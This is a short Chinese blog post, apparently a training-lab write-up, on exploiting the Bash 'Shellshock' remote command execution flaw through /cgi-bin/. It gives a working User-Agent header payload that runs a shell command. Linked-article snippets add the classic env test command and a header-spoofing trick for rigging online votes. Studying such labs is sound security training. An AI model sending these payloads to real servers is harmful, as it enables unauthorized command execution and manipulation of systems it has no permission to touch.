0x2D.Bash漏洞分析溯源

最新推荐文章于 2024-03-07 17:56:07 发布
最新推荐文章于 2024-03-07 17:56:07 发布
阅读量193 收藏
点赞数
分类专栏: 墨者学院 文章标签: 墨者学院 Bash远程命令执行漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_31679787/article/details/102860698
版权

Bash远程命令执行漏洞存在于网站的/cgi-bin/目录下;

抓包后在HTTP请求中插入poc;

poc:

User-Agent: () { :;}; echo; /bin/ls /

再构造poc能够查看key文件;

 

漏洞详情:

https://www.freebuf.com/vuls/44994.html

 

半情调
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
linux .bash_profile和.bashrc的什么区别
09-16
本文将详细分析这两个文件的区别和作用。 /etc/profile 首先,我们需要了解 `/etc/profile` 文件的作用。该文件是系统级别的配置文件,每个用户登录时都会执行该文件。该文件的主要作用是设置系统级别的环境变量和...
python十六进制去掉0x_python内十六进制形式下的'0x2d'和'\x2d'如何理解
weixin_35748288的博客
01-29 3152
如题,这两种表示方法有什么区别。都在什么情况下使用'0x20' 是一个 multi-character character constant 它对应的值是0x30783230(注: '0' 'x' '2' 的 ascii 码分别是 0x30 0x78 0x32)'\x20' 是一个 char 它的值是0x20(注: '\x[0-9a-fA-F]{1,2}' 用16进制表示一个char 比如 '\x...
不同进制的组成规则及相互转换
Da_Wei_Ba_Lang的博客
12-24 1178
各进制组成 二进制组成 以0b开头,由0,1组成,0b10101011。 八进制组成 以0开头,由0,1,2,……,7组成,如07541。 十进制组成 不以0开头的整数,如354。 十六进制组成 以0x开头,由0,1,2……9,a,b,c,d,e,f组成,如0xa354, 0354a。 各进制相互转换 十进制转换成其他进制 首先,将十进制除以该进制的基数取余数,直到商为0,然后把先得到的余数作为低...
Bash漏洞分析溯源
weixin_47493074的博客
10-01 559
Bash漏洞分析溯源
360众测靶场题库之23-Bash漏洞分析溯源
zjl12344的博客
03-07 137
360众测靶场题库
检测cgi-bin漏洞存在方法
热门推荐
xiaoshan812613234的专栏
12-25 2万+
bash漏洞技术层面分析 漏洞起源: 漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告,其中出现了一条验证命令: env x='() { :;}; echo vulnerable' bash -c "echo this is a test", 如果在一个含有版本号小于bash 4.3的linux或者unix系统上执行以上命令,可能会得到以下输出: v
docker-machine.bash
06-03
配置docker-machine, docker-machine.bash
mac 安装omyzsh后不执行~/.bash_profile、~/.bashrc的完美解决办法
01-10
terminal init的时候并不会执行~/.bash_profile、~/.bashrc等脚本了, 这是因为其默认启动执行脚本变为了~/.zshrc。 解决办法就是修改~/.zshrc文件,在其中添加: source ~/.bash_profile、~/.bashrc等脚本文件...
安装git.bash运行sh命令
12-20
Git Bash是一款专为Windows系统设计的命令行工具,它提供了与Unix/Linux环境下相似的命令行体验,使得在Windows上可以方便地使用Git命令。Git Bash是Git版本控制系统的一部分,允许用户执行Git的各种操作,同时也...
BASH漏洞检查
03-09
Linux中一个对计算机用户造成的威 胁“ Bash漏洞
墨者 - Bash漏洞分析溯源
吃肉唐僧的博客
06-30 499
bash代码注入的安全漏洞分析 bash的环境变量 环境变量是操作系统运行shell中的变量,很多程序的运行需要获取系统的环境变量参数。具体赋值格式如下: $ var="hello world" 然后你就可以使用这个变量了,但是只是局部变量,即是当前进程可以用,若当前进程的子进程或者其他进程需要用,需要用到 export将本进程的变量copy到其他进程。丽日...
java 0x2d_终于找到了!有了它你就可以读懂字节码了!
weixin_42553588的博客
02-17 460
该楼层疑似违规已被系统折叠隐藏此楼查看此楼0x80 ior 将栈顶两int型数值作“按位或”并将结果压入栈顶0x81 lor 将栈顶两long型数值作“按位或”并将结果压入栈顶0x82 ixor 将栈顶两int型数值作“按位异或”并将结果压入栈顶0x83 lxor 将栈顶两long型数值作“按位异或”并将结果压入栈顶0x84 iinc 将指定int型变量增加指定值(i++,i--,i+=2)0x...
墨者 - 投票常见漏洞分析溯源
吃肉唐僧的博客
07-18 1308
正常访问,发现需要微信端才可登录 所以伪造微信请求头和ip地址即可 用bp抓包 User-Agent:改成 Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 MicroMessenger/6.0NetType/2G X-Forwarded-For:...
漏洞分析---Bash安全漏洞(CVE-2014-6271)技术简析
平凡之路
10-21 2151
Bash安全漏洞(CVE-2014-6271)技术简析   转自爱毒霸社区,原文链接:http://bbs.duba.net/thread-23211524-1-1.html   一、漏洞起源        漏洞信息最早来源于国外知名漏洞网站exploit-db下的第34765篇漏洞报告,其中出现了一条验证命令: $ env x='() { :;}; echo vulnerable'...
墨者学院 - IIS写权限漏洞分析溯源
多崎巡礼的博客
08-29 1390
漏洞的产生原因来源于服务器配置不当造成,利用IIS PUT Scaner扫描有漏洞的iis,此漏洞主要是因为服务器开启了 webdav的组件导致的可以扫描到当前的操作,具体操作其实是通过webdav的OPTION来查询是否支持PUT。     iis scan工具链接 链接:https://pan.baidu.com/s/1LjeOMxJuNTpez1Se9i7PUw 密码:7m54 ...
sftp用戶 .bash_history .bash_logout .bash_profile .bashrc 详解
最新发布
07-05
1. `.bash_history`: 这是一个隐藏文件,保存了用户在bash shell中的命令历史。每当您在shell中输入命令后,bash会将其添加到这个文件中,以便您可以使用`!`和数字组合重用先前的命令。 2. `.bash_logout`: 当用户...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值